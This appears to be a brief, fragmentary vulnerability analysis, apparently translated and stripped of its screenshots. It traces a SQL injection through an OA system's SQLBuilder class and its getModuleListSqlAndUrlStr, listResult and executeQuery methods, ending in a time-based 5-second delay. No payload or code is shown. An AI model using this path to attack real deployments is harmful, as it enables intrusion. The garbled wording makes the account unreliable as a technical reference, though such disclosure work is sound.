Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

Tag

#sql